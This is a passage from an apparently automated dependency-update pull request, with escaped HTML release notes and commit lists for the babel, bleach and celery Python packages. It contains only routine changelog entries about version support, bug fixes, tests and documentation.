href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1164\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eGeneral: Remove redundant assignment in \u003ccode\u003eCatalog.__setitem__\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1167\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix extracted lineno with nested calls, by \u003ca href=\"https://github.com/dylankiss\"\u003e\u003ccode\u003e@​dylankiss\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1126\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix of list index out of range when translations is empty, by \u003ca href=\"https://github.com/gabe-sherman\"\u003e\u003ccode\u003e@​gabe-sherman\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1135\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix the way obsolete messages are stored by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1132\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Simplify \u003ccode\u003eread_mo\u003c/code\u003e logic regarding \u003ccode\u003ecatalog.charset\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1148\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Use the first matching method \u0026amp; options, rather than first matching method \u0026amp; last options, by \u003ca href=\"https://github.com/jpmckinney\"\u003e\u003ccode\u003e@​jpmckinney\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1121\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDeprecation and compatibility\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Fix deprecation warnings for `datetime.utcnow()` by @tomasr8 in :gh:`1119`\n* Docs: Adjust docs/conf.py to add compatibility with sphinx 8 by @hrnciar in :gh:`1155`\n* General: Import `Literal` from the typing module by @tomasr8 in :gh:`1175`\n* General: Replace `OrderedDict` with just `dict` by @tomasr8 in :gh:`1149`\n* Messages: Mark `wraptext` deprecated; use `TextWrapper` directly in `write_po` by @akx in :gh:`1140`\n\u003cp\u003eInfrastructure\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Add tzdata as dev dependency and sync with tox.ini by @wandrew004 in :gh:`1159`\n* Duplicate test code was deleted by @mattdiaz007 in :gh:`1138`\n* Increase test coverage of the `python_format` checker by @tomasr8 in :gh:`1176`\n* Small cleanups by @akx in :gh:`1160`, :gh:`1166`, :gh:`1170` and :gh:`1172`\n\u0026amp;lt;/tr\u0026amp;gt;\u0026amp;lt;/table\u0026amp;gt; \n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/b50a1d2186c20f3359f7e10853d2b2225a46ed40\u0026quot;\u0026gt;\u0026lt;code\u0026gt;b50a1d2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Prepare for 2.17.0 (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1182\u0026quot;\u0026gt;#1182\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5f117b2689573aa98acc8a47108c49b99f4d1394\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5f117b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Increase test coverage of the \u0026lt;code\u0026gt;python_format\u0026lt;/code\u0026gt; checker (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1176\u0026quot;\u0026gt;#1176\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/363ad7531fb5dcdc3e9844573592b0b44afb914b\u0026quot;\u0026gt;\u0026lt;code\u0026gt;363ad75\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Fix dates formatting \u0026lt;code\u0026gt;Y\u0026lt;/code\u0026gt;, \u0026lt;code\u0026gt;w\u0026lt;/code\u0026gt; and \u0026lt;code\u0026gt;W\u0026lt;/code\u0026gt; symbols for week-numbering (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1179\u0026quot;\u0026gt;#1179\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/e9c3ef8d0de3080ca59f7f8dbabf9b52983adc7d\u0026quot;\u0026gt;\u0026lt;code\u0026gt;e9c3ef8\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1173\u0026quot;\u0026gt;#1173\u0026lt;/a\u0026gt; from python-babel/lc-monetary-2\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/56ef7c7f578a904917464c187e399abb762bd5e3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;56ef7c7\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Prefer LC_MONETARY when formatting currency\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/aee6d698b541dc50439280d7e093092cc0d4b832\u0026quot;\u0026gt;\u0026lt;code\u0026gt;aee6d69\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;code\u0026gt;default_locale\u0026lt;/code\u0026gt;: support multiple keys\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/2d8a808864d1aae5d3d02d4f95917c79740c5d35\u0026quot;\u0026gt;\u0026lt;code\u0026gt;2d8a808\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Import \u0026lt;code\u0026gt;Literal\u0026lt;/code\u0026gt; \u0026amp;amp; \u0026lt;code\u0026gt;TypedDict\u0026lt;/code\u0026gt; from the typing module (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1175\u0026quot;\u0026gt;#1175\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/98b9562c05e5276038c27ec12c12f3e92dc027b6\u0026quot;\u0026gt;\u0026lt;code\u0026gt;98b9562\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Add basic support for \u0026lt;code\u0026gt;Message.python_brace_format\u0026lt;/code\u0026gt; (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1169\u0026quot;\u0026gt;#1169\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/0c1091c9de9543e30bc4b845eb10b5bf84516d7b\u0026quot;\u0026gt;\u0026lt;code\u0026gt;0c1091c\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Small test cleanup (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1172\u0026quot;\u0026gt;#1172\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/db4879136a7fbcef475f26b75dbdd65d0ce488f9\u0026quot;\u0026gt;\u0026lt;code\u0026gt;db48791\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1170\u0026quot;\u0026gt;#1170\u0026lt;/a\u0026gt; from python-babel/small-cleanup\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/2.0...v2.17.0\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 1.4.1 to 6.2.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 6.2.0 (October 29th, 2024)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for Python 3.8. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/737\"\u003e#737\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.13. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/736\"\u003e#736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove six depdenncy. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate known-good versions for tinycss2. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/732\"\u003e#732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix additional \u0026lt; followed by characters and EOF issues. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/728\"\u003e#728\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 6.1.0 (October 6th, 2023)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for Python 3.7. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/709\"\u003e#709\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.12. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/710\"\u003e#710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix linkify with arrays in querystring (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/436\"\u003e#436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle more cases with \u0026lt; followed by character data (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/705\"\u003e#705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix entities inside a tags in linkification (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/704\"\u003e#704\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate cap for tinycss2 to \u0026lt;1.3 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/702\"\u003e#702\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated Sphinx requirement\u003c/li\u003e\n\u003cli\u003eAdd dependabot for github actions and update github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 6.0.0 (January 23rd, 2023)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003ebleach.clean\u003c/code\u003e, \u003ccode\u003ebleach.sanitizer.Cleaner\u003c/code\u003e,\n\u003ccode\u003ebleach.html5lib_shim.BleachHTMLParser\u003c/code\u003e: the \u003ccode\u003etags\u003c/code\u003e and \u003ccode\u003eprotocols\u003c/code\u003e\narguments were changed from lists to sets.\u003c/p\u003e\n\u003cp\u003eOld pre-6.0.0:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/73871d766de1e33a296eeb4f9faf2451f28bee39\"\u003e\u003ccode\u003e73871d7\u003c/code\u003e\u003c/a\u003e Prep for a 6.2.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/156c5898b3b20e4a582b4a366c18355ecad477cf\"\u003e\u003ccode\u003e156c589\u003c/code\u003e\u003c/a\u003e Remove six dependency from html5lib (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/5a4790716e8b976a838327593baf6c3b9f95612f\"\u003e\u003ccode\u003e5a47907\u003c/code\u003e\u003c/a\u003e Drop six as a requirement; add six_shim.py (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6a2ec5ca371cb666fbd843f14ecf1e93e8f7ea87\"\u003e\u003ccode\u003e6a2ec5c\u003c/code\u003e\u003c/a\u003e Update known-good versions of tinycss2 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/732\"\u003e#732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/32efc2656bbfb825637fa6a435af11181664fcdf\"\u003e\u003ccode\u003e32efc26\u003c/code\u003e\u003c/a\u003e Fix additional \u0026lt; followed by characters and EOF issues (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/728\"\u003e#728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/648a97d0884ccddf8a7a9887adc83d32974688dc\"\u003e\u003ccode\u003e648a97d\u003c/code\u003e\u003c/a\u003e Add support for Python 3.13 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/736\"\u003e#736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/d1e40ed3d9ee7d593de2a534a81df677baf145c1\"\u003e\u003ccode\u003ed1e40ed\u003c/code\u003e\u003c/a\u003e Drop support for Python 3.8 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/737\"\u003e#737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/4bc1bff36841c04152525b8e57fd3740f34ec796\"\u003e\u003ccode\u003e4bc1bff\u003c/code\u003e\u003c/a\u003e Update dev requirements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/fcbe8f7fb144f3e65cbf00a464433558c80badec\"\u003e\u003ccode\u003efcbe8f7\u003c/code\u003e\u003c/a\u003e Update dev dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/f8fb8482687df63d158d6eccfa2a8153ab467367\"\u003e\u003ccode\u003ef8fb848\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 3 to 4\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v1.4.1...v6.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 3.1.18 to 5.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emake the tests run on python 3.13 for gcs backend by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9677\"\u003ecelery/celery#9677\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded DeepWiki to README by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9683\"\u003ecelery/celery#9683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLimit redis to \u0026lt;=v5.2.1 to match Kombu by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9693\"\u003ecelery/celery#9693\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse EX_OK instead of literal zero by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9684\"\u003ecelery/celery#9684\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake wheel metadata reproducible by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9687\"\u003ecelery/celery#9687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003elet celery install from kombu dependencies for better align by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9696\"\u003ecelery/celery#9696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix stamping documentation to clarify stamped_headers key is optional in visitor methods by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9697\"\u003ecelery/celery#9697\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport apply_async without queue argument on quorum queues by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdated rabbitmq doc about using quorum queues with task routes by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9707\"\u003ecelery/celery#9707\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd: Dumper Unit Test by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit test for event.group_from by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add beat_cron_starting_deadline documentation warning by \u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for workers by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9695\"\u003ecelery/celery#9695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixes issue with retry callback arguments in DelayedDelivery by \u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eget_exchange-unit-test by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9710\"\u003ecelery/celery#9710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eISSUE-9704: Update documentation of result_expires, filesystem backend is supported by \u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate to blacksmith ubuntu 24.04 by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9717\"\u003ecelery/celery#9717\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded unit tests for celery.utils.iso8601 by \u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate introduction.rst docs by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9728\"\u003ecelery/celery#9728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.3 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9732\"\u003ecelery/celery#9732\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.2...v5.5.3\"\u003ehttps://github.com/celery/celery/compare/v5.5.2...v5.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes by \u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES by \u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section by \u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9675\"\u003ecelery/celery#9675\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/celery/celery/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.5.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-06-01\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- make the tests run on python 3.13 for gcs backend ([#9677](https://github.com/celery/celery/issues/9677))\n- Added DeepWiki to README 